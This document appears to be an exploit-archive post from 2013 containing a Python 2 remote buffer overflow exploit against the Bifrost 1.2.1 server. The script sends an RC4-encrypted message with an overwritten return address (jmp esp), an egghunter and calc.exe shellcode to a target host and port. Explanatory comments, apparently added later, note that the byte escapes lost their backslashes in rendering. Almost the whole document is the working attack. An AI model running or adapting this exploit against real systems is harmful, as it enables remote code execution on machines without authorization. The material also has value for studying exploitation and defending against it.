
Bifrost 1.2.1 Remote Buffer Overflow

Posted on 02 July 2013

#!/usr/bin/python2.7
#By : Mohamed Clay
"""Proof-of-concept client for the Bifrost 1.2.1 remote buffer overflow.

Python 2 only: it relies on print statements, ``str.decode("hex")`` and
``itertools.izip``. The script builds one Bifrost-style message (a 4-byte
length header followed by an RC4-encrypted body), opens a TCP connection to
``host port`` from the command line and sends it once.

NOTE(review): every byte-escape in this listing is missing its backslash
(``"xA3x78..."`` rather than ``"\\xA3\\x78..."``); this looks like an artefact
of how the page was rendered. As written here the literals are plain ASCII
text, and the ``len(...)`` arithmetic below operates on that text.
"""
import socket
from time import sleep          # unused in this file
from itertools import izip, cycle  # unused in this file
import base64                   # unused in this file
import sys


def rc4crypt(data, key):
    """Encrypt/decrypt ``data`` with RC4 under ``key`` (symmetric).

    Operates on Python 2 byte strings; returns a string of the same length.
    Because the key below is a fixed literal, any observer that knows it can
    recover the plaintext of the message this script sends.
    """
    # Key-scheduling (KSA): permute 0..255 driven by the repeated key bytes.
    x = 0
    box = range(256)
    for i in range(256):
        x = (x + box[i] + ord(key[i % len(key)])) % 256
        box[i], box[x] = box[x], box[i]
    # Keystream generation (PRGA), XORed byte by byte into the output.
    x = 0
    y = 0
    out = []
    for char in data:
        x = (x + 1) % 256
        y = (y + box[x]) % 256
        box[x], box[y] = box[y], box[x]
        out.append(chr(ord(char) ^ box[(box[x] + box[y]) % 256]))
    return ''.join(out)


def bif_len(s):
    """Pad the hex-digit string ``s`` with "00" until it is at least 8 chars.

    Two characters are appended per step, so an odd-length input ends up
    9 characters long rather than 8.
    """
    while len(s)<8:
        s=s+"00"
    return s


def header(s):
    """Turn hex-digit pairs of ``s`` into a 4-byte header.

    Bytes are taken from positions 0-1, 2-3, 4-5 and 5-6 of ``s`` using the
    Python 2-only ``str.decode("hex")``.
    """
    a=(s[0]+s[1]).decode("hex")
    a+=(s[2]+s[3]).decode("hex")
    a+=(s[4]+s[5]).decode("hex")
    a+=(s[5]+s[6]).decode("hex")
    return a


def random():
    """Return eight trailing fields of 1000 'A' bytes, each ended by '|'.

    Despite the name this is deterministic padding; the name also shadows the
    stdlib ``random`` module if it were ever imported here.
    """
    a=""
    for i in range(0,8):
        a+="A"*1000+"|"
    return a


def usage():
    """Print the banner and command-line usage."""
    print " ***************************"
    print " * By : Mohamed Clay *"
    print " * Bifrost 1.2.1 Exploit *"
    print " *************************** "
    print " Usage : ./bifrost1.2.1 host port"
    print " Example : ./bifrost1.2.1 192.168.1.10 81 "


# --- command line: exactly two positional arguments, host and port ---
if len(sys.argv)!=3:
    usage()
    exit()
HOST=sys.argv[1]
PORT=int(sys.argv[2])

# Fixed RC4 key used for the message body (see rc4crypt above).
key="xA3x78x26x35x57x32x2Dx60xB4x3Cx2Ax5Ex33x34x72x00"
xor="xB2x9Cx51xBB" # we need this in order to bypass 0046A03E function
eip="x53x93x3Ax7E" # jmp esp User32.dll
egghunter = "x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8x77x30x30x74x8BxFAxAFx75xEAxAFx75xE7xFFxE7";
#calc.exe shellcode (badchars "x00")
buf ="xb8x75xd3x5cx87xd9xeexd9x74x24xf4x5bx31xc9"
buf +="xb1x33x31x43x12x83xebxfcx03x36xddxbex72x44"
buf +="x09xb7x7dxb4xcaxa8xf4x51xfbxfax63x12xaexca"
buf +="xe0x76x43xa0xa5x62xd0xc4x61x85x51x62x54xa8"
buf +="x62x42x58x66xa0xc4x24x74xf5x26x14xb7x08x26"
buf +="x51xa5xe3x7ax0axa2x56x6bx3fxf6x6ax8axefx7d"
buf +="xd2xf4x8ax41xa7x4ex94x91x18xc4xdex09x12x82"
buf +="xfex28xf7xd0xc3x63x7cx22xb7x72x54x7ax38x45"
buf +="x98xd1x07x6ax15x2bx4fx4cxc6x5exbbxafx7bx59"
buf +="x78xd2xa7xecx9dx74x23x56x46x85xe0x01x0dx89"
buf +="x4dx45x49x8dx50x8axe1xa9xd9x2dx26x38x99x09"
buf +="xe2x61x79x33xb3xcfx2cx4cxa3xb7x91xe8xafx55"
buf +="xc5x8bxedx33x18x19x88x7ax1ax21x93x2cx73x10"
buf +="x18xa3x04xadxcbx80xfbxe7x56xa0x93xa1x02xf1"
buf +="xf9x51xf9x35x04xd2x08xc5xf3xcax78xc0xb8x4c"
buf +="x90xb8xd1x38x96x6fxd1x68xf5xeex41xf0xd4x95"
buf +="xe1x93x28"

# Padding so the egghunter field and the shellcode field each reach a fixed
# size; the sizes depend on len() of the literals as they appear in this file.
raw=(1000-533-len(egghunter))*"x90"
raw2=(1000-8-len(buf))*"x41"+"|"

# Message type 30 -> hex "1e" -> single leading byte 0x1e (Python 2 decode).
command=30
tmp=hex(command).split("0x")[1]

# Plaintext body: '|'-separated fields. Large runs of repeated bytes and the
# literal "w00tw00t" tag are the plaintext indicators a sensor holding the
# fixed key above could match on after decryption.
data=tmp.decode("hex")+"F"*2+" "*511+xor+"C"*8+eip+"A"*12+egghunter+raw+"|"+" "*1000+"|"+"w00tw00t"+buf+raw2+random()
out=rc4crypt(data,key)

# Length header: hex(len(data)) without "0x", padded, then packed to bytes.
l=header(bif_len(str(hex(len(data))).split("0x")[1]))
out=l+out

# Single TCP connection; the socket is never closed explicitly.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(out)
print " [*] By : Mohamed Clay"
print "[*] Exploit completed "

 

